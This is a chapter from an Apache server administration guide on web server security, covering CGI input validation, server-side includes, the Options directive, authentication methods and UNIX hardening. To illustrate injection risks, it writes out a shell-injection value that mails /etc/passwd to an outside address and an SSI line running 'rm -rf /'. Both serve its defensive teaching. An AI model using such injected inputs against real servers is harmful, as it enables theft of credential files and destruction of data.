Chapter 16: Web Server Security Issues

Apache Server Survival Guide

Chapter 16: Web Server Security Issues

Web Server Security Issues

Throughout this book I have not discussed the security implications of running a Web server mainly because I wanted to focus all this vital information into a single chapter. My thinking is that by putting all security information together, it would be much easier for you to read and reference. While other chapters may have made a reference to security, they didn't address it. This chapter does.

More than likely after you read this information, you'll be worrying about a few things. That's good. You should worry. While at times I may sound paranoid, take it with a grain of salt. The level of security you implement should reflect the level of security that you need. Creating a secure network is a very extensive topic, and one that changes constantly. This chapter will focus closely on the issues that affect a Web server; general network security is touched on but not really addressed.

Why Security?

Connecting a computer to the Internet is a very exciting event. It opens up a world of information and communication. By setting up a Web server, you have plugged into that world and transformed yourself into an information provider. The only trouble is that by doing so you have just exposed your network to a series of potential security problems. These dangers are packaged in many forms, including the following:

Unauthorized use of your computing resources
Denial of service attacks
Information theft
Vandalism

While any of these issues should warrant terror from you, knowing what they do will help you prepare to face these possibly adverse situations.

Before you go any further, you should think of dedicating a system to serving Web pages. This system should be a bare bones machine: Have no user accounts and contain minimal software. It also should not be directly on your local area network (LAN). If you haven't set up a firewall yet, do it. A firewall will isolate your network from the Internet—a smart thing to do.

Unauthorized Use of Computing Resources

Many of the attacks on a network have obtaining illicit use of your systems as their goal. These attackers will try to seize control of your system using its resources for whatever they see fit. While on the surface this seems like the least harmful of problems, these attackers can create serious problems that could even affect your reputation. For one, your systems could become the home base from which to launch attacks onto other networks. They could turn your computers into illegal software distribution depots by distributing copies of copyrighted or pornographic material right from your systems!

Denial of Service Attacks

Denial of service attacks are designed to keep you from using your own computing resources. Some of the attacks can capitalize on known vulnerabilities of your operating system, such as flooding your system with so much e-mail that it cannot keep up with other legitimate requests. Intruders can also shut down your equipment, affecting services that are available to other users of your network. Sometimes this sort of attack is part of a well-orchestrated attack towards another system. By making a trusted system unavailable, an attacker could make another computer masquerade as your trusted host and gain access to a different machine.

Information Theft

Information theft may be a serious problem if you store sensitive information on your systems. Even if you don't, the information gathered could be used to gain further access to your system or personal information that should be kept private. Confidential information, be it your secret formula for lemonade or your banking records, should not be anyone's business but your own.

Vandals

This is probably the most annoying of all attacks. A vandal will attempt to destroy information that you keep on your computer. Your best survival technique is simple. Have a backup of your data! Why would someone do this? Usually its a personal attack by a disgruntled employee or someone else that somehow thinks they have a score to settle.

How Do They Get In?

People who break into computers do it by exploiting some sort of software weakness. Usually, this is a bug in some program or a library. Many years back, sendmail, the mailer agent that delivers mail on most UNIX machines, was the target for one of these types of attacks. The sendmail worm exploited known bugs, and while it created no damage to data, the worm managed to consume all the resources of the effected computer. The sendmail worm managed to invade thousands of computers in just a few hours.

If you see what I am getting at, most security problems are rooted in software bugs. This is why it is extremely important that your software is kept up-to-date. Systems that are running old software are more likely to be broken into because they contain bugs and problems that are known.

Unlike PCs and Macintoshes, UNIX systems offer a wide range of services. For example, if you tried to FTP into a Mac or a PC, you would not be able to do it unless the user installed a program that supported this protocol. Under UNIX, this and many other client/server programs are already installed and waiting for a connection. For a list of what is running on your system, check your /etc/inetd.conf file.

Even if you don't know anything about plumbing, you can easily understand that the more complicated the plumbing, the easier it is to clog a drain. Software is not any different. The more complicated a program is, the more likely that it has bugs. Web servers are complicated programs, and your UNIX box is full of many complex programs, including shells and interpreters.

Thankfully, Apache doesn't have any known security problems. A basic configuration setting is fairly secure because it doesn't permit the execution of CGI programs or Server Side Includes. If you forget for a minute about all the other potential problems outside of your Web server, you will find that the source of security problems on a Web server is usually caused by you, the administrator. Here's a list of the possible holes you can open:

Insecure CGI programs you write or insecure programs others write that get placed into your server.
Permissive and promiscuous security policies you set; this allows other users or uninvited guests to override your security policies. This refers to permitting the use of per-directory access files (.htaccess).
Additional server features that you enable. Unless you know what those third-party modules do and how they have been coded, it is difficult to see if any of them will cause you grief. The best defense is to run a minimal server: one that supplies the absolute minimum level of facilities that do what you need. This approach has the added benefit of making your server lighter in weight, which translates into a faster and more responsive server.

You should be able to tell I am emphasizing (and maybe putting my foot on my mouth) that Apache, from a software standpoint, is fairly secure. No known bugs have severe security implications in the current version, and if one was discovered, the Apache team would be quick to rectify the situation. Always run the latest and greatest software to avoid problems.

From a Web server standpoint, the main focus of your worries should focus on CGI and SSI because these two powerful features usually process user data. If you trust that the input data is good, you are in for something.

My first recommendation is that you should carefully evaluate any CGIs you have written. Your CGIs should be coded defensively because unexpected input will cause problems. This simply means that the information your CGI takes in should not be trusted and must be qualified before it is passed to another program for execution.

Data sent by a visitor via a form should be digested carefully. Just because input is generated by a form that you coded doesn't mean that the visitor didn't alter your form in an attempt to crash your program. Perhaps they returned different values or more data than what you expected. Their intent is to capitalize on a weakness, such as overflowing your CGI. Perhaps a path specification is different from what you would normally expect.

What your CGI can receive could be anything. Maybe through their e-mail address there's an attempt at getting your computer to do something else. Unless you are ready to cope with that possibility, you are creating a huge security risk.

Avoiding Bad Input

Here's what you should keep in mind regarding filenames:

Filenames you code are OK.
Filenames sent by a form or coded by others are not.
Restrict the files that others can supply to you. Perhaps have your program only access files that you explicitly permit.
Your CGI programs should be able to gracefully handle a missing temporary file. Perhaps your CGI programs should be able to determine if the file they are opening is the one they thought it was.
Filenaming. Keep it simple: Only allow filenames that use letters and numbers. Any other character is suspicious. Spaces or other whitespace in a filename can introduce problems. This also means that under UNIX, you really don't want files that start with periods (.), semicolons (;), or dashes (-). Files that include any of the shell metacharacters should not be permitted. Metacharacters are characters like * or ?, which have a special meaning to a shell.
File permissions. Perhaps temporary files should not be world readable or writable, since this allows users from within your organization to read information that they perhaps should not. This is the one reason to have your server run as special user such as 'httpd,' so that you can assign a reasonable umask. The umask (the user mask) is used to set the default file permission. The easiest way to calculate a umask is to subtract the permissions from it.

If you want your files to be readable and writable by you and no one else, you need to set your file mode to 700 (I added 400+200+100 from the following table). To create an umask that responds to this file mode, subtract 700 from 777. This leaves you with a umask of 77. Typically, you specify umasks with a 0 for the owner bit because you want to be able to have execute permissions on directories and executables you create, thus you would specify a 077 umask value.
Permissions under UNIX take the following bits, which that you can add or subtract to arrive at the permissions you want.

Bit Mode	Significance
4000	Set user ID on execution
2000	Set group ID on execution
1000	Set sticky bit*
0400	Read by owner
0200	Write by owner
0100	Execute (search in directory) by owner
0040	Read by group
0020	Write by group
0010	Execute (search in a directory) by group
0004	Read by others
0002	Write by others
0001	Execute by others

*When set, unprivileged users cannot delete or rename files of other users in that directory

Securing Your CGI

The main problem with CGIs is passing user variables when executing an exec() or system() call. These variables, if not carefully watched, could contain shell metacharacters that will cause the shell to do something other than what was intended.

Suppose you have a simple script that uses the UNIX utility grep to search the contents of a phone database. The user enters a first or last name, and the script returns any matching items. The script does most of its work like this (please note that Perl has much better, built-in ways of doing this). Here's the script:

system("grep $pattern database");

The pattern variable is set from a form input by the user. Now see what would happen if the user entered a line like the following:

"-v ffffffff /etc/passwd |mail someAddress"

This effectively would send your /etc/passwd file via e-mail to someAddress. The -v argument to grep tells it to include all lines that don't match. Our matching pattern ffffffff more than likely won't match anyone.

The real solution to this type of problem is to do several things. One easy way of dealing with this problem is by making a call to system a little differently:

system("/bin/grep", $pattern, "database");

By doing this, you have eliminated calling a shell. This effectively eliminated the calling of a shell, which would have interpreted the pipe and done something you didn't want. Alternatively, you could have escaped each special shell character before passing it to the grep call, as this line of Perl shows:

$pattern =~ s/[^\w]/\\\&/g;
system("grep \"$pattern\" database");

Perl has built-in checks for shell metacharacters and other expressions that could spell trouble. To enable this feature, just start your Perl scripts with #!/usr/local/bin/perl -T.

This will enable Perl's taint checks. Data from outside the program (environment variables, standard input stream, or program arguments) cannot use eval(), exec(), system(), or piped open() calls. Any program variable that obtains a value from one of these sources also becomes tainted and cannot be used either. In order for you to use a tainted variable, you'll need to untaint it. Untainting requires that you perform a pattern matching on the tainted variable that extracts matched substrings. To untaint an e-mail address, use the following code:

$email=~/([\w-.]+\@[\w-.]+)/;

Server Parsed HTML (SSI) Security Issues

Server Parsed HTML (SPML), also known as Server Side Includes (SSI), provides a convenient way of performing server-side processing on an HTML file before it is sent to the client. This allows for the opportunity to introduce some dynamic features without having to program a CGI to provide the functionality.

SPML documents are processed by the server before they are sent to the client. Only documents with a MIME type text/x-server-parsed-html or text/x-server-parsed-html3 are parsed. The resulting HTML is given a MIME type text/html and is sent back to the client.

SPML can include information such as the current time, can execute a program, or can include a document, just by adding some special SPML commands to your HTML page. When the HTML page is properly identified to the server as containing SPML tokens, the server parses the file and sends the results to the client requesting it. While this seems rather innocuous, it isn't. SSIs are parsed like a script and can be a source of grief.

File inclusion is not usually a problem, as long as users are not including sensitive files such as /etc/passwd. One condition to watch for is SSI that are built from data provided by an user over the Web. Suppose that you created a bulletin board SSI that would include items added by external users via a CGI. If your CGI was not smart enough to check for what it is being handed, it is possible for a user to add something nasty such as a line like <!--#cmd cmd="/bin/rm -rf />. This, as you guessed, would attempt to remove all files in your disk. Obviously, the example is intended as an illustration.

Security and Permissions

Exercising security on your Web site means enforcing policies. If you happen to allow per-directory access files, in a way you have relinquished some control over the implementation of that policy. From an administrative point of view, it is much better to manage one global access file (conf/access.conf) with many different entries than a minimal global configuration file plus hundreds of per-directory access files.

Per-directory access files also have the terrible side effect of slowing down your server considerably because, once enabled, your server will scan each directory in the path to a request. If found, it then needs to figure out what options to apply and in what order. This takes time.

The Options Directive

Permissions are specified in <Directory> sections in the global access control file or on a per-directory basis with .htaccess files. The Options directive specifies what server options are enabled for that particular server domain. Here are some of the options:

All Enables all options except MultiViews.
ExecCGI Enables the execution of CGI programs.
FollowSymLinks Enables the traversing of symbolic links.
Includes Enables the use of SSI.
IncludesNOEXEC Enables the use of SSI with the following restrictions: The #exec and #include commands are disabled.
Indexes Enables the return of a server-generated directory listing for requests where there is no DirectoryIndex file (index.html).
MultiViews Enables content negotiation based on document language. See the LanguagePriority directive in Chapter 10, "Apache Modules."
SymLinksIfOwnerMatch The traversing of symbolic links is allowed if the target file or directory is owned by the same user as the link. This setting offers better security than the FollowSymLinks option.

The following is a list of the security issues raised by the Options directive. Relevance to your particular application depends on what type of site you manage.

ExecCGI

On my site, the option to run CGIs on a directory other than cgi-bin doesn't pose many security risks because I control all CGI programs on the server. However, if you have a melange of users, permitting execution of CGIs from anywhere may be too permissive and is a way of asking for trouble.

FollowSymLinks

The FollowSymLinks option is another option to worry about. If a user is able to create a link to a directory from inside your Web document tree, she's just created an alternative way of navigating into the rest of your filesystem. You can consider this option as an easy way to publish your entire disk to the world. The SynLinksIfOwnerMatch option tries to mitigate this option a bit. However, both these options are very dangerous if your ship is not a tight one.

Includes

Includes allows the execution of SSI in the directory. This option can be tamed down by specifying the IncludesNOEXEC option, which disables file inclusion (so your users cannot do a ) or executes programs from within an include statement.

Indexes

This feature can be corrupted easily. If you recall the discussion about FollowSynLinks, automatic indexes go hand-in-hand with it. When the user travels to a directory that doesn't contain a user-generated index file, one gets generated by the server if you have automatic indexing enabled. This basically provides a nice listing of your files and provides a nice interface with which to retrieve them.

Access Control

Apache provides you with several methods of authenticating users before you grant them access to your materials. Third-party modules provide support for an even greater number. You can authenticate using cookies, SQL databases, flat files, and so on. You can also control access to your machine based on the IP of the host requesting the documents. Neither of these methods provides a good measure of security by themselves; however, together they are much more robust.

There are a few issues that should be mentioned before you rely on any of these methods.

Filtering By Address

Although looking at a machine's address to determine if it is a friendly computer is better than not doing it, any host can be spoofed. Some evildoers on the Net can configure their computers to pretend to be someone you know. Usually this is done by making a real host unavailable and then making the Domain Name System (DNS) provide the wrong information. For your security, you may want to enable -DMAXIMUM_DNS while compiling the server software (under Apache 1.1 there's a new directive HostnameLookups that does the same thing as a runtime directive). This will solicit a little more work on your computer because DNS information will need to be verified more closely. Typically, the server will do a reverse lookup on the IP address of a client to get its name. Setting up the HostnameLookups will force one more test. After the name is received, the server will query DNS for its IP address. If they both match, things are cool. Otherwise, the access fails.

Login and Passwords

One problem with login and password verification over the Web is that an evildoer can have a ball at trying to crack a password. On many UNIX systems, if you tried this at a user account, the system would eventually disable access to the account, making it more difficult to break in. On the Web, you could try a few hundred passwords in a few seconds (with a little software) without anyone noticing it. Obviously, this doesn't present much danger, with the exception of obtaining access to private information, until you consider that most users use one password for most services.

Basic Authentication

Basic authentication is basic in that information exchanged between the browser and the server is not encrypted in any way. This method only encodes, not encrypts, the authentication session. Anyone that can intercept your authentication session can decode it and use the information to access your materials. The browser sends in authentication information with each request to the protected realm, which means that your login and password are sent not once, but several times through the wire.

To resolve this problem, a new method has been introduced: Digest authentication. Unlike Basic, Digest encodes and encrypts (trivially) the password in a way that it is only valid for the requested resource. If someone captured the authentication information and was able to decode it, that password would only be useful to retrieve that one resource. Access to each page requires a new password, which the browser generates. This makes the entire process a bit more secure.

If you want to have truly secure access to your server and you don't want to send passwords in the clear, the only current viable solution is to use an SSL server, such as Stronghold or Apache SSL. Chapter 14, "Secure Web Servers," goes into great detail about these products. An SSL server ensures that information sent between the browser and the server is kept confidential. So even if someone is spying on the line, it is very difficult to recover the original information. Secure transactions also ensure that the data you receive originated from a trusted point.

Protecting UNIX

One way of reducing the likelihood of a problem is to reduce the number of sources to potential problems. One way of dealing with this is to reduce the number of software systems that could be subverted in an unexpected way, meaning your server should be as light as possible in the software department.

Your host should house the minimum number of users possible.
Your host should house the necessary Internet services (see your /etc/inetd.conf file for services you are currently running). Remove services that are not needed.
Your host should be running the latest stable versions of the server programs, including sendmail, httpd, ftp, and so on.
The logfiles in your host should be checked often.

Additional Sources of Security Information

If you don't do much about security, the least you could do is frequently read the newsgroup comp.security.announce. This Usenet group contains posts for the Computer Emergency Response Team (CERT), which lists security holes as they are found. The CERT home page (see Figure 16.1) can be found at http://www.cert.org.

Figure 16.1. The CERT Coordination Center's home page.

In addition to CERT advisories, you may want to check Internet Security Systems, Inc.'s home page (see Figure 16.2). It is located at http://www.iss.net. Its Web site has a nice mailing list and a vulnerability database for a variety of programs where security problems are grouped. Naturally, there's one for Apache too.

Figure 16.2. Internet Security Systems, Inc.'s home page.

There are many excellent books available that will provide more detail than you'll probably ever need. Here's a few:

UNIX Security for the Organization, by Richard Bryant, Sams Publishing.

Internet Firewalls and Network Security, by Karanjit Siyan, Ph.D. and Chris Hare, New Riders Publishing.

Building Internet Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky, O'Reilly & Associates, Inc.

Practical UNIX Security, by Simson Garfinkel and Gene Spafford, O'Reilly & Associates, Inc.

Summary

The issues in this chapter only begin to address a few of the many configuration issues that may affect the security of your site. Security is a very complex issue. Because of UNIX and the networking necessary to make a Web server work, your task is a complicated one. I hope some of the warnings will point you in the right direction. And yes, while some of the examples are extreme, they were meant to catch your attention. The truth is you really cannot be sure of what can be done. Expect the unexpected, and prepare for disaster. This way, should you be unfortunate and have a security breach, you'll be prepared to deal with it from a practical, as well as an emotional, point of view.

Document any security problems you may find. If you think something is not right, document it. If you shut down your system, the intruder will know she's been had, and it will be very difficult for you to track her. On the other hand, if you wait and document, you may have a better chance of catching her and finding out her true identity.

All	Enables all options except MultiViews.
ExecCGI	Enables the execution of CGI programs.
FollowSymLinks	Enables the traversing of symbolic links.
Includes	Enables the use of SSI.
IncludesNOEXEC	Enables the use of SSI with the following restrictions: The #exec and #include commands are disabled.
Indexes	Enables the return of a server-generated directory listing for requests where there is no DirectoryIndex file (index.html).
MultiViews	Enables content negotiation based on document language. See the LanguagePriority directive in Chapter 10, "Apache Modules."
SymLinksIfOwnerMatch	The traversing of symbolic links is allowed if the target file or directory is owned by the same user as the link. This setting offers better security than the FollowSymLinks option.